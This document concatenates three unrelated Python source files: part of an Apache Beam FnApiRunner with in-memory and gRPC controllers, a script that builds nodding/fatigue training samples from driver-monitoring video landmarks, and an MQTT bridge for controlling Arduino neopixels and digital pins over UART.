process_bundle = beam_fn_api_pb2.InstructionRequest(
instruction_id=self._next_uid(),
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_reference=registration.register.
process_bundle_descriptor[0].id))
for (transform_id, name), elements in input_data.items():
data_out = data_plane_handler.output_stream(
process_bundle.instruction_id, beam_fn_api_pb2.Target(
primitive_transform_reference=transform_id, name=name))
data_out.write(elements)
data_out.close()
control_handler.push(process_bundle)
while True:
result = control_handler.pull()
if result.instruction_id == process_bundle.instruction_id:
if result.error:
raise RuntimeError(result.error)
expected_targets = [
beam_fn_api_pb2.Target(primitive_transform_reference=transform_id,
name=output_name)
for (transform_id, output_name), _ in sinks.items()]
for output in data_plane_handler.input_elements(
process_bundle.instruction_id, expected_targets):
target_tuple = (
output.target.primitive_transform_reference, output.target.name)
if target_tuple not in sinks:
# Unconsumed output.
continue
sink_op = sinks[target_tuple]
coder = sink_op.output_coders[0]
input_stream = create_InputStream(output.data)
elements = []
while input_stream.size() > 0:
elements.append(coder.get_impl().decode_from_stream(
input_stream, True))
if not sink_op.write_windowed_values:
elements = [e.value for e in elements]
for e in elements:
sink_op.output_buffer.append(e)
return
def execute_map_tasks(self, ordered_map_tasks, direct=False):
if direct:
controller = FnApiRunner.DirectController()
else:
controller = FnApiRunner.GrpcController()
try:
for _, map_task in ordered_map_tasks:
logging.info('Running %s', map_task)
self._run_map_task(
map_task, controller.control_handler, controller.state_handler,
controller.data_plane_handler, controller.data_operation_spec())
finally:
controller.close()
@staticmethod
def _reencode_elements(elements, element_coder):
output_stream = create_OutputStream()
for element in elements:
element_coder.get_impl().encode_to_stream(element, output_stream, True)
return output_stream.get()
# These classes are used to interact with the worker.
class SimpleState(object): # TODO(robertwb): Inherit from GRPC servicer.
def __init__(self):
self._all = collections.defaultdict(list)
def Get(self, state_key):
return beam_fn_api_pb2.Elements.Data(
data=''.join(self._all[self._to_key(state_key)]))
def Append(self, state_key, data):
self._all[self._to_key(state_key)].extend(data)
def Clear(self, state_key):
try:
del self._all[self._to_key(state_key)]
except KeyError:
pass
@staticmethod
def _to_key(state_key):
return state_key.window, state_key.key
class DirectController(object):
"""An in-memory controller for fn API control, state and data planes."""
def __init__(self):
self._responses = []
self.state_handler = FnApiRunner.SimpleState()
self.control_handler = self
self.data_plane_handler = data_plane.InMemoryDataChannel()
self.worker = sdk_worker.SdkWorker(
self.state_handler, data_plane.InMemoryDataChannelFactory(
self.data_plane_handler.inverse()))
def push(self, request):
logging.info('CONTROL REQUEST %s', request)
response = self.worker.do_instruction(request)
logging.info('CONTROL RESPONSE %s', response)
self._responses.append(response)
def pull(self):
return self._responses.pop(0)
def done(self):
pass
def close(self):
pass
def data_operation_spec(self):
return None
class GrpcController(object):
"""An grpc based controller for fn API control, state and data planes."""
def __init__(self, sdk_harness_factory=None):
self.sdk_harness_factory = sdk_harness_factory
self.state_handler = FnApiRunner.SimpleState()
self.control_server = grpc.server(
futures.ThreadPoolExecutor(max_workers=10))
self.control_port = self.control_server.add_insecure_port('[::]:0')
self.data_server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
self.data_port = self.data_server.add_insecure_port('[::]:0')
self.control_handler = streaming_rpc_handler(
beam_fn_api_pb2_grpc.BeamFnControlServicer, 'Control')
beam_fn_api_pb2_grpc.add_BeamFnControlServicer_to_server(
self.control_handler, self.control_server)
self.data_plane_handler = data_plane.GrpcServerDataChannel()
beam_fn_api_pb2_grpc.add_BeamFnDataServicer_to_server(
self.data_plane_handler, self.data_server)
logging.info('starting control server on port %s', self.control_port)
logging.info('starting data server on port %s', self.data_port)
self.data_server.start()
self.control_server.start()
self.worker = (self.sdk_harness_factory or sdk_worker.SdkHarness)(
'localhost:%s' % self.control_port)
self.worker_thread = threading.Thread(target=self.worker.run)
logging.info('starting worker')
self.worker_thread.start()
def data_operation_spec(self):
url = 'localhost:%s' % self.data_port
remote_grpc_port = beam_fn_api_pb2.RemoteGrpcPort()
remote_grpc_port.api_service_descriptor.url = url
return remote_grpc_port
def close(self):
self.control_handler.done()
self.worker_thread.join()
self.data_plane_handler.close()
self.control_server.stop(5).wait()
self.data_server.stop(5).wait()
class RunnerResult(maptask_executor_runner.WorkerRunnerResult):
def __init__(self, state, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._metrics_by_stage = metrics_by_stage
def only_element(iterable):
element, = iterable
return element
def unique_name(existing, prefix):
if prefix in existing:
counter = 0
while True:
counter += 1
prefix_counter = prefix + "_%s" % counter
if prefix_counter not in existing:
return prefix_counter
else:
return prefix
|
generate_datasets_from_testreal.py
|
# -*- coding: UTF-8 -*-
'''=================================================
@Author :zhenyu.yang
@Date :2020/11/5 11:37 AM
=================================================='''
import sys
sys.path.append('./')
sys.path.insert(0,'/data/zhenyu.yang/modules')
import cv2
import json
import numpy as np
import random
import copy
from multiprocessing import Process
import os
def getFiles(path, suffix):
return [os.path.join(root, file) for root, dirs, files in os.walk(path)
for file in files if file.endswith(suffix)]
def get_ear(ldmk):
eps = 1e-5
get_distance = lambda x,y:((x[0]-y[0])**2 + (x[1]-y[1])**2 + eps)**0.5
w = get_distance(ldmk[0],ldmk[4])
h = get_distance(ldmk[2],ldmk[6])
ear = h/w
ear = min(ear,0.7)
return ear
def get_ear_height(ldmk):
heights = [ldmk[2][1]-ldmk[6][1],ldmk[1][1]-ldmk[7][1],ldmk[3][1]-ldmk[5][1]]
return np.mean(np.abs(heights))
def get_fea_label(img_info):
eye_center = [-1,-1]
if 'ldmk' in img_info and img_info['ldmk'] is not None and len(img_info['ldmk']) > 4:
ldmk = np.array(img_info['ldmk'])
eye_ldmk = ldmk[36:47]
x,y = np.mean(eye_ldmk,axis= 0)
eye_center = [x,y]
return eye_center
def get_perclose(height_list):
max_height = max(height_list)
preclose_list = [1 - v/max_height for v in height_list]
preclose_50 = sum(v > 0.5 for v in preclose_list)
preclose_70 = sum(v > 0.7 for v in preclose_list)
preclose_90 = sum(v > 0.9 for v in preclose_list)
return [preclose_50,preclose_70,preclose_90]
def get_eye_movement(height_list):
height_change = [abs(height_list[i+1] - height_list[i]) for i in range(len(height_list)-1)]
return sum(v>1 for v in height_change) / len(height_list)
def list2num(slice_list):
num_list = []
for slice in slice_list:
num_list.extend(list(range(slice[0], slice[1] + 1)))
return num_list
def is_stretch(stretch_list,left_index,right_index):
# 1 : stretch 0: normal -1 : ignore
max_union = -1
frame_len = right_index - left_index
for stretch in stretch_list:
stretch_len = abs(stretch[1] - stretch[0])
temp_left = max(left_index,stretch[0])
temp_right = min(right_index,stretch[1])
if [temp_left,temp_right] in [stretch,[left_index,right_index]]:
return 1
union = (temp_right - temp_left) /( min(stretch_len,frame_len) + 0.1)
max_union = max(max_union,union)
if max_union < 0.1:
return 0
return -1
def min_is_nodding(x_list,threshold):
if sum(v!=-1 for v in x_list) == 0 :
return 0
if x_list[len(x_list)//2] == -1:
return 0
_x = x_list[len(x_list)//2]
x_list = [v for v in x_list if v != -1]
if max(x_list) - min(x_list) > threshold and _x in [max(x_list) ,min(x_list)]:
return 1
def is_nodding(x_list,half_frame_len = 8,threshold = 4):
ans = []
for i in range(half_frame_len, len(x_list) - half_frame_len):
ans.append(min_is_nodding(x_list[i-half_frame_len:i+half_frame_len],threshold))
return sum(ans)
def get_batch_data(video_list,suffix,dst_dir,time_len = 10):
random.shuffle(video_list)
half_frame_len = time_len*25//2
half_frame_len = 40
while True:
if len(video_list) == 0:
break
video_path = video_list.pop()
video_suffix = '.mp4'
if video_path.endswith('.mp4'):
video_suffix = '.mp4'
elif video_path.endswith('.avi'):
video_suffix = '.avi'
json_path = video_path.replace(video_suffix, suffix)
if not os.path.exists(json_path):
continue
stretch_path = video_path.replace(os.path.basename(video_path), 'nodding.json')
if not os.path.exists(stretch_path):
continue
with open(stretch_path, 'r') as f:
stretch_list = json.load(f)
try:
stretch_list = stretch_list[os.path.basename(video_path).replace(video_suffix,'')]
except:
continue
with open(json_path, 'r') as f:
big_json = f.readlines()
skeleton_list = []
for json_info in big_json:
try:
json_info = json.loads(json_info.strip())
except:
continue
skeleton_list.append(get_fea_label(json_info))
for stretch in stretch_list:
stretch = list(map(int,stretch))
temp_eye_list = skeleton_list[stretch[0]:stretch[1]]
temp_eye_list.append(1)
frame_id = sum(stretch)//2
npy_name = '_'.join(video_path.split(os.sep)[-4:]).replace(video_suffix,'')
npy_name = '{}__{}__{}.json'.format(1, npy_name, frame_id)
with open(os.path.join(dst_dir, npy_name), 'w') as f:
json.dump(temp_eye_list, f)
temp_count = 0
for i in range(10000*len(stretch_list)):
frame_id = int(random.random()*len(skeleton_list))
if i < half_frame_len or i >= len(skeleton_list) - (half_frame_len+1):
continue
temp_stretch = is_stretch(stretch_list,frame_id-half_frame_len,frame_id+half_frame_len)
if temp_stretch != 0:
continue
temp_count += 1
temp_eye_list = skeleton_list[frame_id-half_frame_len:frame_id+half_frame_len]
temp_eye_list.append(0)
npy_name = '_'.join(video_path.split(os.sep)[-4:]).replace(video_suffix,'')
npy_name = '{}__{}__{}.json'.format(0, npy_name, frame_id)
with open(os.path.join(dst_dir, npy_name), 'w') as f:
json.dump(temp_eye_list, f)
if temp_count > len(stretch_list):
break
def split(input,num=60):
random.shuffle(input)
ans = []
sep = len(input) //num
for i in range(num-1):
ans.append(input[i*sep:(i+1)*sep])
ans.append(input[(num-1)*sep:])
return ans
if __name__ == '__main__':
version = 'v0.1'
suffix = '_{}.json'.format(version)
src_dir_dict = {'train':'/data/weiyu.li/DMSData/FatigueView/raw_video',
'test':'/data/weiyu.li/DMSData/FatigueView/test_video'
}
src_dir_dict = {'test':'/data/weiyu.li/DMSData/FatigueView/test_video'
}
camera_list = ['ir_down','ir_front','ir_left','ir_left_up','ir_up','rgb_down','rgb_front','rgb_left','rgb_left_up','rgb_up']
# camera_list = ['rgb_left','rgb_left_up','rgb_up']
src_dir_dict = {'sanbao_test':'/data/weiyu.li/DMSData/FatigueView/sanbao_test_video',
}
camera_list = ['ir_down']
data_type = 'train'
camera_id = 0
for data_type in src_dir_dict.keys():
for camera_id in range(len(camera_list)):
src_dir = src_dir_dict[data_type]
camera_type = camera_list[camera_id]
dst_dir = './data/{}/{}'.format(data_type,camera_type)
if not os.path.exists(dst_dir):
os.makedirs(dst_dir)
video_list = getFiles(src_dir, '.mp4')
video_list += getFiles(src_dir, '.avi')
# if data_type == 'test':
# video_list = [v for v in video_list if 'fengchunshen' not in v and 'panbijia' not in v]
#
#
# if data_type == 'train':
# video_list = [v for v in video_list if 'zhaoxinmei' not in v]
all_num = 60000
running_num = 32
running_num = min(running_num,len(video_list))
batch_size = all_num//running_num
split_videos = split(video_list, running_num)
process_list = []
for i in range(running_num):
temp_p = Process(target=get_batch_data,args=(split_videos[i],suffix,dst_dir,))
process_list.append(temp_p)
for temp_p in process_list:
temp_p.start()
for temp_p in process_list:
temp_p.join()
print('END')
|
aumhMQTT.py
|
###############################################################################
# a umhMQTT.py #
# #
# Python library for controlling an arduino using Arduino_UART_MessageHandler #
# utilizing an mqtt client. #
# #
# Copyright(C) 2015, Destrudo Dole #
# #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the Free #
# Software Foundation, version 2 of the license. #
###############################################################################
from __future__ import print_function
import serial
import pprint
import sys
import struct
import time
import socket
import copy
import multiprocessing
import logging
import paho.mqtt.client as mqtt
from aumh import *
from aumhConfig import *
from aumhDigital import *
from aumhNeopixel import *
MSG_HOST_OFFSET = 1
MSG_SERVICE_OFFSET = 2
MSG_ID_OFFSET = 3
MSG_CLASS_OFFSET = 4
MSG_STRAND_OFFSET = 5 #This doubles as the add offset.
MSG_COMMAND_OFFSET = 6
MSG_PIXEL_OFFSET = 7
#Digital utilized data
MSG_PIN_OFFSET = 5 #Doubles as add offset
MSG_PIN_CMD_OFFSET = 6
DIGITAL_MSG_CONTENT = {
"direction":{
#Output stuff
"output":OUTPUT,
"out":OUTPUT,
"1":OUTPUT,
#Input stuff
"input":INPUT,
"in":INPUT,
"0":INPUT,
},
"state":{
"high":HIGH,
"low":LOW,
},
"class":{
"digital":C_DIGITAL,
"0":C_DIGITAL,
"analog":C_ANALOG,
"1":C_ANALOG,
},
"get":{
1:"high",
0:"low",
}
}
#Device class ID (For device differentiation)
SERVICEID="uartmh"
#Separating this because when I move the module out it'll be happier.
MQTTPROCESSTIMEOUT = 1
MQTTPROCESSTIMELIMIT = 120
class UARTDevices:
def __init__(self, port, baud=BAUD):
self.port = port
self.baud = baud
self.id = None
self.UMHI = None #Here we want to actually create the
#This will be the class to handle mqtt messages
class aumhMQTT:
def __init__(self, hostname, port, logmethod=None, logfile=None):
self.logmethod = logmethod
if logfile:
self.logConfigure(logfile)
self.hostname = str(socket.gethostname())
self.devices = {}
self.client = mqtt.Client(client_id="uart-mh@%s" % self.hostname)
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.max_inflight_messages_set(100);
self.client.connect(hostname, port, 10)
self.messageHandlers = {}
self.neopixelBuffer = {}
self.timeElapsed = 0
self.timeMax = 200 #(ms)
self.threadInstances = {}
self.threadInstancePipes = {}
self.busyThreadBuffer = {}
#self.threadSema = multiprocessing.Semaphore()
#self.threadSema.release()
self.threadPostSema = multiprocessing.Semaphore()
self.threadPostSema.release()
def logConfigure(self, logfile=None):
if self.logmethod == "logger":
if not logfile:
print("aumh.logConfigure() called as logger type without filename for log.")
sys.exit(1)
self.logger = logging.getLogger("aumh")
self.logger.setLevel(logging.INFO)
self.logformatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
self.loghandler = logging.FileHandler(logfile)
self.loghandler.setFormatter(self.logformatter)
self.logger.addHandler(self.loghandler)
def log(self, data, mode=None):
if not self.logmethod or self.logmethod == "print":
print(data)
elif self.logmethod == "logger":
if mode == "err":
self.logger.error(data)
elif mode == "warn":
self.logger.warning(data)
elif mode == "crit":
self.logger.critical(data)
else: #Mode is info or something else.
self.logger.info(data)
def has_instance(self, name, id):
if len(self.devices) == 0:
return False
if id not in self.devices:
return False
if str(name) not in self.devices[id]:
return False
return True
def add_instance(self, name, instance):
self.messageHandlers[name] = instance
def add_instance(self, name, instance, id):
if not id:
self.log("UART_MH_MQTT.add_instance, got no ID.")
return None
if id not in self.devices:
if name is not "mhconfig":
self.log("UART_MH_MQTT.add_instance, not configured device and instance was not mhconfig.")
return None
self.devices[id] = {}
self.devices[id][name] = instance
else:
if "mhconfig" not in self.devices[id]: #Triple check so we know if we have some oddity.
self.log("UART_MH_MQTT.add_instance, strangely misconfigured device id: %s" % str(id))
if name in self.devices[id]: #Issue a warning that we're overwriting the old device instance
self.log("UART_MH_MQTT.add_instance, device->instance name already in use. Replacing it.")
self.devices[id][name] = instance
return True
def add_device(self, config):
pass
def on_connect(self, client, userdata, flags, rc):
self.client.subscribe("/%s/#" % self.hostname, 0)
# We're looking at a structure like this:
# %hostname%/neopixel
# %hostname%/neopixel/%strandid%/
# %hostname%/neopixel/%strandid%/set/
# %hostname%/neopixel/%strandid%/set/%led% = (r,g,b)
# %hostname%/neopixel/%strandid%/config = [ o, old data| f, fresh data | u, unknown ] #This is a published path
# %hostname%/neopixel/%strandid%/config/pin = value
# %hostname%/neopixel/%strandid%/config/length = value
# %hostname%/neopixel/%strandid%/config/leds/%led% = (r,g,b)
# %hostname%/neopixel/add = (%strandid%,%pin%,%len%)
# %hostname%/digital/%pin%/aset/%value% #This value gets set
# %hostname%/digital/%pin%/aget #After setting any value to this dir, value/%val% will be published
# %hostname%/digital/%pin%/get #After setting any value to this dir, value/%val% will be published
# %hostname%/digital/%pin%/set/%value% #this value gets set
# %hostname%/digital/%pin%/value/%val% #This is published to
# %hostname%/control
#RENAME MULTISET TO THIS.
#This is the worker thread to be which waits for timeMax or a send command to be reached
def neopixel_set_t(self):
#Get current time
#if (current time) == (lastTime + timeMax):
# send data
pass
#Note: This can be simplified in the future by actually applying the common method names for each class type.
def on_message(self, client, userdata, msg):
if "/config" in msg.topic:
return None
try:
msgIdent = msg.topic.split("/")[3]
if msgIdent not in self.devices:
self.log("UART_MH_MQTT.on_message, ident [%s] not in devices." % str(msgIdent))
return None
except:
return None
msgL = msg.topic.split("/")
if "neopixel" in msg.topic and "neopixel" in self.devices[msgIdent]:
if len(msgL) < 5:
self.log("Bogus neopixel message received. [incomplete data]")
return None
if isInt(msgL[MSG_STRAND_OFFSET]):
if (int(msgL[MSG_STRAND_OFFSET]) > 254) or (int(msgL[MSG_STRAND_OFFSET]) < 0):
self.log("Bogus neopixel message received. [strand id error]")
return None
else:
if (msgL[MSG_STRAND_OFFSET] != "add"):
self.log("Bogus neopixel message received. [unexpected topic '%s']" % str(msgL[4]))
return None
if msgL[MSG_STRAND_OFFSET] == "add":
data = msg.payload.split(",")
#FIXME, make sure the data len value is correct.
if len(data) != 3:
self.log("Bogus neopixel message received. [add missing data]")
return None
umhmsg = {
"id":int(data[0]),
"command":"add",
"type":"neopixel",
"data":{
"pin":int(data[1]),
"length":int(data[2]),
}
}
if self.devices[msgIdent]["neopixel"].sendMessage(self.devices[msgIdent]["neopixel"].createMessage(umhmsg)):
self.log("neopixel mqtt issue sending message.")
return None #After this we want to leave.
#FIXME, If it fails here, I set it from 6.
if len(msgL) >= 7:
# FIXME, This is the starting point for the revised neopixel mqtt stuff.
umhmsg = {
"id":int(msgL[MSG_STRAND_OFFSET]),
"type":"neopixel",
"data":{}
}
if msgL[MSG_COMMAND_OFFSET] == "get":
umhmsg["command"] = "get"
out = self.devices[msgIdent]["neopixel"].np_get(umhmsg["id"], umhmsg)
if not out:
return None
ltopic = "/%s/%s/%s" % ( str(self.hostname), str(SERVICEID), str(msgIdent) )
for pixel in out["pixels"]:
for color in out["pixels"][pixel]:
self.client.publish("%s/neopixel/%s/config/%s/%s" % ( str(ltopic), str(umhmsg["id"]), str(pixel), str(color) ), struct.unpack("<B", out["pixels"][pixel][color])[0] )
if msgL[MSG_COMMAND_OFFSET] == "set" or msgL[MSG_COMMAND_OFFSET] == "seti": #Set commands handler
rgbS = msg.payload.split(",")
rgbI = []
for sv in rgbS:
rgbI.append(int(sv))
for iChk in rgbS: #Do we really want to perform this check?
if iChk == "" or iChk == None: #If we have a blank message.
self.log("neopixel mqtt blank message.")
return None
if int(iChk) < 0 or int(iChk) > 255:
self.log("neopixel mqtt message outside int limits.")
return None
umhmsg["data"]["leds"] = { str(msgL[MSG_PIXEL_OFFSET]):rgbI }
if msgL[MSG_COMMAND_OFFSET] == "seti":
umhmsg["command"] = "ctrli"
if self.devices[msgIdent]["neopixel"].sendMessage(self.devices[msgIdent]["neopixel"].createMessage(umhmsg)):
self.log("neopixel mqtt seti issue sending message.")
return None #break away so that we don't need to deal with anything else.
umhmsg["command"] = "ctrl"
if int(msgL[MSG_STRAND_OFFSET]) not in self.threadInstances:
self.threadInstancePipes[int(msgL[MSG_STRAND_OFFSET])] = multiprocessing.Pipe()
if int(msgL[MSG_STRAND_OFFSET]) in self.busyThreadBuffer:
if len(self.busyThreadBuffer[msgL[MSG_STRAND_OFFSET]]) > 0:
for data in self.busyThreadBuffer[msgL[MSG_STRAND_OFFSET]]:
for part in data['data']:
umhmsg['data'][part] = data['data'][part]
self.busyThreadBuffer.pop(int(msgL[MSG_STRAND_OFFSET]), None)
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])] = multiprocessing.Process(target=self.multiSet, args=(umhmsg, self.threadInstancePipes[int(msgL[MSG_STRAND_OFFSET])], copy.copy(msgIdent), MQTTPROCESSTIMEOUT, MQTTPROCESSTIMELIMIT,))
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])].start()
return None #Break out completely, we don't want to do anything else.
try:
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])].join(0.005)
except:
pass
if self.threadInstances[int(msgL[MSG_STRAND_OFFSET])].is_alive(): #If it's been started.
if not self.threadPostSema.acquire(False): #THIS NEEDS TO BE MODIFIED TO BE FOR A PARTICULAR threadPostSema, not ALL threadPostSema's
if not int(msgL[MSG_STRAND_OFFSET]) in self.busyThreadBuffer:
self.busyThreadBuffer[int(msgL[MSG_STRAND_OFFSET])] = []
self.busyThreadBuffer[int(msgL[MSG_STRAND_OFFSET])].append(copy.copy(umhmsg))
else:
self.threadInstancePipes[int(msgL[MSG_STRAND_OFFSET])][1].send(umhmsg)
self.threadPostSema.release() #Release no matter what.
else: #it's dying.
#Cleanup
self.threadInstancePipes[int(msgL[MSG_STRAND_OFFSET])] = None
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])].terminate()
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])] = None
#Create new instance
self.threadInstancePipes[int(msgL[MSG_STRAND_OFFSET])] = multiprocessing.Pipe()
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])] = multiprocessing.Process(target=self.multiSet, args=(umhmsg, self.threadInstancePipes[int(msgL[MSG_STRAND_OFFSET])], msgIdent, MQTTPROCESSTIMEOUT, MQTTPROCESSTIMELIMIT,))
self.threadInstances[int(msgL[MSG_STRAND_OFFSET])].start()
elif msgL[MSG_COMMAND_OFFSET] == "del": #deletion command
if msg.payload != msgL[MSG_STRAND_OFFSET]:
self.log("neopixel mqtt del command issued with mismatched payload. [%s,%s]" % ( str(msgL[MSG_STRAND_OFFSET]), str(msg.payload) ) )
return None
umhmsg["command"] = "del"
umhmsg["data"]["id"] = int(msg.payload)
if self.devices[msgIdent]["neopixel"].sendMessage(self.devices[msgIdent]["neopixel"].createMessage(umhmsg)):
self.log("neopixel mqtt issue sending del message.")
elif msgL[MSG_COMMAND_OFFSET] == "gradient":
data = msg.payload.split(",")
start = data[0]
end = data[4]
sRGB = data[1:4]
eRGB = data[5:8]
umhmsg["start"] = start
umhmsg["end"] = end
umhmsg["startColor"] = sRGB
umhmsg["endColor"] = eRGB
if self.devices[msgIdent]["neopixel"].np_gradient(int(msgL[MSG_STRAND_OFFSET]),umhmsg):
self.log("bad gradient.")
elif msgL[MSG_COMMAND_OFFSET] == "clear":
self.log("Clear message")
umhmsg["command"] = "clear"
umhmsg["data"]["id"] = int(msg.payload)
if self.devices[msgIdent]["neopixel"].sendMessage(self.devices[msgIdent]["neopixel"].createMessage(umhmsg)):
self.log("neopixel mqtt issue sending clear message.")
elif "digital" in msg.topic and "digital" in self.devices[msgIdent]:
if len(msgL) < 5:
self.log("Bogus digital message received.")
return None
if isInt(msgL[MSG_PIN_OFFSET]):
if (int(msgL[MSG_PIN_OFFSET]) > 254) or (int(msgL[MSG_PIN_OFFSET]) < 0):
self.log("Bogus digital message received. [pin error]")
return None
else:
if (msgL[MSG_PIN_OFFSET] != "add"):
self.log("Bogus digital message received. [unexpected topic: %s]" % str(msgL[MSG_PIN_OFFSET]))
return None
if msgL[MSG_PIN_OFFSET] == "add":
data = msg.payload.split(",")
if (len(data) < 3) or (len(data) > 4):
self.log("Bogus digital message received. [incorrect number of values in add command]")
return None
umhmsg = {
"pin":int(data[0]),
"command":"add",
"type":"digital",
"data":{
"pin":int(data[0]),
"direction":int(data[1]),
"class":int(data[2]),
}
}
if len(data) == 4:
if umhmsg["data"]["direction"] == 1:
umhmsg["command"] = "sap"
umhmsg["data"]["state"] = int(data[3])
#We don't yet want to support gap, but when we do, it'll be here.
if self.devices[msgIdent]["digital"].sendMessage(self.devices[msgIdent]["digital"].createMessage(umhmsg)):
self.log("digital mqtt issue sending add message.")
if len(msgL) == 7:
umhmsg = {
"pin":int(msgL[MSG_PIN_OFFSET]),
"type":"digital",
}
if msgL[MSG_PIN_CMD_OFFSET] == "direction" or msgL[MSG_PIN_CMD_OFFSET] == "class":
pinData = self.devices[msgIdent]["digital"].getPin(int(msgL[MSG_PIN_OFFSET]))
if not pinData:
return None
#change local pin direction
umhmsg["data"] = pinData
if msg.payload.lower() not in DIGITAL_MSG_CONTENT[msgL[MSG_PIN_CMD_OFFSET]]:
self.log("digital mqtt issue with direction message, content: %s" % str(msg.payload) )
return None
#convert local pin mode data to umhmsg
umhmsg["data"][msgL[MSG_PIN_CMD_OFFSET]] = DIGITAL_MSG_CONTENT[msgL[MSG_PIN_CMD_OFFSET]][msg.payload.lower()]
self.devices[msgIdent]["digital"].addPin(umhmsg["data"])
umhmsg["command"] = "cpin"
#call cpin
if self.devices[msgIdent]["digital"].sendMessage(self.devices[msgIdent]["digital"].createMessage(umhmsg)):
self.log("digital mqtt issue sending %s message." % str(msgL[MSG_PIN_OFFSET]))
elif msgL[MSG_PIN_CMD_OFFSET] == "state" or msgL[MSG_PIN_CMD_OFFSET] == "set" :
pinData = self.devices[msgIdent]["digital"].getPin(int(msgL[MSG_PIN_OFFSET]))
if not pinData:
self.log("No pin data!")
return None
umhmsg["data"] = pinData
if isInt(msg.payload):
umhmsg["data"]["state"] = int(msg.payload)
elif msg.payload.lower() in DIGITAL_MSG_CONTENT["state"]:
umhmsg["data"]["state"] = DIGITAL_MSG_CONTENT["state"][msg.payload.lower()]
else:
self.log("digital mqtt issue with direction message, content: %s" % str(msg.payload) )
return None
umhmsg["command"] = "set"
#call cpin
if self.devices[msgIdent]["digital"].sendMessage(self.devices[msgIdent]["digital"].createMessage(umhmsg)):
self.log("digital mqtt issue sending direction message.")
elif msgL[MSG_PIN_CMD_OFFSET] == "get":
ltopic = "/%s/%s/%s" % ( str(self.hostname), str(SERVICEID), str(msgIdent) )
pinData = self.devices[msgIdent]["digital"].getPin(int(msgL[MSG_PIN_OFFSET]))
umhmsg["command"] = "get"
umhmsg["data"] = pinData
retData = self.devices[msgIdent]["digital"].sendMessage(self.devices[msgIdent]["digital"].createMessage(umhmsg))
pinData["state"] = struct.unpack("<h",retData[0:2])[0]
self.client.publish("%s/digital/%s/config/state" % ( str(ltopic), str(pinData["pin"]) ), str(pinData["state"]))
self.devices[msgIdent]["digital"].addPin(pinData)
else:
self.log("Bogus digital mqtt topid for cmd offset: %s" % str(msgL[MSG_PIN_CMD_OFFSET]))
return None
else:
self.log("Unknown topic")
#This is for set commands which support more than one command at the same time (Thus the need to concat a bunch of commands together.)
def multiSet(self, setDictI, pipeD, msgIdent, timeout, timeLimit):
cTimeout = time.time() + timeout
cTimeLimit = time.time() + timeLimit
while ( (time.time() < cTimeout) and time.time() < cTimeLimit and pipeD != None ):
if pipeD[0].poll(0.02): #We'll poll for a second (Since it has little bearing on the world)
dIn = pipeD[0].recv()
#No matter the message, we should extend the time limit.
cTimeout = time.time() + timeout
if isinstance(dIn, str): #If we have one of the request inputs [NI]
#Do things for single string
continue
if not isinstance(dIn, dict):
continue
if setDictI['type'] == "neopixel":
if len(dIn) != 4:
self.log("multiSet neopixel mqtt issue with pipe in: '%s'" % str(dIn))
#We might want to send a message back reporting the failure.
continue
if "data" not in dIn:
self.log("multiSet neopixel mqtt issue with pipe in [no data]")
#We might want to send a message back reporting the failure.
continue
for key in dIn["data"]["leds"]: #We're only doing this for the future possibility of multiple led's set in one command
setDictI["data"]["leds"][key] = dIn["data"]["leds"][key]
self.threadPostSema.acquire() #We want blocking from this direction.
try:
if setDictI['type'] == "neopixel":
try:
if self.devices[msgIdent]["neopixel"].sendMessage(self.devices[msgIdent]["neopixel"].createMessage(setDictI)):
self.log("multiSet neopixel mqtt issue sending message.")
except:
self.log("multiSet neopixel mqtt, exception met when sending message.")
except:
self.threadPostSema.release()
return 1
self.threadPostSema.release()
return 0
#Once every 10 seconds we want to make a publish call which posts all known data
#Once every minute, each class instance type provided will get called for management
# information in order to make sure everything is updated (Without constantly making
# calls which have no need getting called a billion times a second)
def publisher(self):
cfgData = {}
for device in self.devices:
if "mhconfig" not in self.devices[device]: #This shouldn't be possible.
self.log("UART_MH_MQTT.publisher(), no mhconfig")
continue
self.client.publish("/%s/uartmh" % str(self.hostname), str(device))
cfgData[device] = {}
if "neopixel" in self.devices[device]:
cfgData[device]["neopixel"] = []
data = self.devices[device]["neopixel"].np_manage()
try:
if not data.startswith("NAK"):
datal = list(data)
count = struct.unpack("<B", datal.pop(0))[0]
for i in range(0, count):
relI = i * 4
pID = struct.unpack(">B", data[1+relI])[0]
pin = struct.unpack(">B", data[2+relI])[0]
length = struct.unpack(">H", data[3+relI:5+relI])[0]
cfgData[device]["neopixel"].append({ "id":pID, "pin":pin, "length":length })
except:
self.log("MQTTHandler.publisher(), issue handling neopixel instance.")
if "digital" in self.devices[device]:
cfgData[device]["digital"] = []
data = self.devices[device]["digital"].digi_manage()
try:
if not data.startswith("NAK"):
datal = list(data)
count = struct.unpack("<B", datal.pop(0))[0] #Get the first byte
for i in range(0, count):
relI = i * 6
pin = struct.unpack("<h", data[1+relI:3+relI])[0]
direction = struct.unpack("<B", data[3+relI])[0]
state = struct.unpack("<h", data[4+relI:6+relI])[0]
pClass = struct.unpack("<B", data[6+relI])[0]
lPin = { "pin":pin, "direction":direction, "state":state, "class":pClass }
self.devices[device]["digital"].addPin(copy.copy(lPin))
cfgData[device]["digital"].append( lPin )
except:
self.log("MQTTHandler.publisher(), issue handling digital instance.")
for device in cfgData:
ltopic = "/%s/%s/%s" % ( str(self.hostname), str(SERVICEID), str(device) )
for mhType in cfgData[device]:
if mhType == "neopixel":
#Publish configuration data
for data in cfgData[device]["neopixel"]:
#Make sure each dict value contains id,pin and length.
self.client.publish("%s/neopixel/%s/config" % ( str(ltopic), str(data["id"]) ),"o")
self.client.publish("%s/neopixel/%s/config/pin" % ( str(ltopic), str(data["id"]) ),str(data["pin"]))
self.client.publish("%s/neopixel/%s/config/length" % ( str(ltopic), str(data["id"]) ),str(data["length"]))
if mhType == "digital":
for data in cfgData[device]["digital"]:
self.client.publish("%s/digital/%s/config" % ( str(ltopic), str(data["pin"]) ), "o")
self.client.publish("%s/digital/%s/config/direction" % ( str(ltopic), str(data["pin"]) ), str(data["direction"]))
